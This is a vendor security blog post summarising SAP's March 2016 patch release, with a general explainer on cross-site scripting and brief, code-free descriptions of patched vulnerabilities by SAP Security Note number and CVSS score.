SAP has released the monthly critical patch update for March 2016. This patch update closes 28 vulnerabilities in SAP products including 18 SAP Security Patch Day Notes and 10 Support Package Notes. 12 of all Notes were released after the second Tuesday of the previous month and before the second Tuesday of this month. 3 of all notes are updates to previous Security Notes.
3 of all closed SAP Securtiy Notes have a high priority rating and 2 have a Hot News rating. The highest CVSS score of the vulnerabilities is 9.0.
Most of the discovered vulnerabilities belong to the SAP JAVA applications security.
The most common vulnerability type is Cross-Site Scripting and Information disclosure.
This month, five critical vulnerabilities found by ERPScan researcher Vahagn Vardanyan were closed.
About XSS Vulnerabilities
Today, in 2016 we still can state that an XSS vulnerability remains the most common type of security issues in SAP Applications. It is one of the oldest types of vulnerabilities in software. XSS vulnerability was first officially introduced in the beginning of 2000th and, unfortunately, it still exists. Cross-site scripting occurs when a web application takes untrusted data without proper validation or escaping measures and displays it on a webpage. XSS allows an attacker to execute scripts in the victim’s browser to steal user sessions, deface web sites, or redirect the victim to malicious sites. According to the OWASP Top 10 list, a cross-site scripting vulnerability is ranked third in prevalence in web applications.
As for SAP Cyber Security, cross-site scripting is the most frequent vulnerability in SAP products not only in this month. Analysis of 3000 Vulnerabilities in SAP research states that 22% of all vulnerabilities found in SAP products are XSS. 727 XSS vulnerabilities were closed in 2009-2015. Over 100 XSS vulnerabilities were reported only by ERPScan researchers.
This type of vulnerabilities is a common problem not only in SAP’s software but on SAP’s servers. For example, earlier we have written that SAP website contained a 0-day XSS vulnerability disclosed by a researcher.
Taking into account the importance and prevalence of this vulnerability, the ERPScan research team has published a white paper describing the ways how to protect SAP from XSS. We would like to draw attention to this issue once again and recommend that you follow this guideline.
Issues that were patched with the help of ERPScan
Below are the details of the SAP vulnerabilities that were found by ERPScan researcher.
- An XML external entity vulnerability in SAP Configuration Wizard (CVSS Base Score: 6.4). Update is available in SAP Security Note 2235994. An attacker can use an XML external entity vulnerability to send specially crafted unauthorized XML requests which will be processed by an XML parser. This vulnerability allows the attacker to get unauthorised access to OS filesystem.
- A Cross-site scripting vulnerability in SAP NavigationURLTester (CVSS Base Score: 6.1). Update is available in SAP Security Note 2238375. An attacker can use a Cross-site scripting vulnerability to inject a malicious script into a page. More information about XSS vulnerabilities in SAP systems is available in ERPScan’s research.
- A Cross-site scripting vulnerability in SAP User Interface/Navigation (CVSS Base Score: 6.1). Update is available in SAP Security Note 2238765. An attacker can use a Cross-site scripting vulnerability to inject a malicious script into a page.
- A Directory traversal vulnerability in SAP Java Monitoring (CVSS Base Score: 5.8). Update is available in SAP Security Note 2234971. An attacker can use a Directory traversal to access arbitrary files and directories located in an SAP server filesystem including application source code, configuration, and system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system.
- An Information disclosure vulnerability in SAP Real Time Collaboration Chat (CVSS Base Score: 4.3). Update is available in SAP Security Note 2255990. An attacker can use Information disclosure vulnerability to reveal additional information (system data, debugging information, etc) that will help him to learn about a system and to plan other attacks.
Other critical issues closed by SAP Security Notes March 2016
Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. Companies providing SAP Security Audit, SAP Vulnerability Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists. The most critical vulnerabilities of this update can be patched by the following SAP Security Notes:
- 2260344: SAP SCTC_* Function modules has an OS command execution vulnerability (CVSS Base Score: 9.0 ). An attacker can use an OS command execution vulnerability to execute operating system commands. Executed commands will run with the same privileges as the service that executed them. The attacker can access arbitrary files and directories located in an SAP server filesystem including application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system. Install this SAP Security Note to prevent risks.
- 2037304: SAP SDCC Download Function Module has an Implementation flaw vulnerability (CVSS Base Score: 8.5). Depending on the problem, an implementation flaw can cause unpredictable behaviour of a system, troubles with stability and safety. Patches solve configuration errors, add new functionaluty and increase system stability. Install this SAP Security Note to prevent risks.
- 2253850: SAP RTMF has an XML external entity vulnerability (CVSS Base Score: 6.3 ). An attacker can use an XML external entity vulnerability to send specially crafted unauthorized XML requests which will be processed by an XML parser. This vulnerability allows the attacker to get unauthorised access to OS filesystem. Install this SAP Security Note to prevent risks.
It is highly recommended that SAP customers patch all those SAP vulnerabilities to prevent business risks affecting SAP systems.
SAP has traditionally thanked the security researchers from ERPScan for found vulnerabilities on their acknowledgment page.
Advisories for those SAP vulnerabilities with technical details will be available in 3 months on erpscan.com. Exploits for the most critical vulnerabilities are already available in ERPScan Security Monitoring Suite.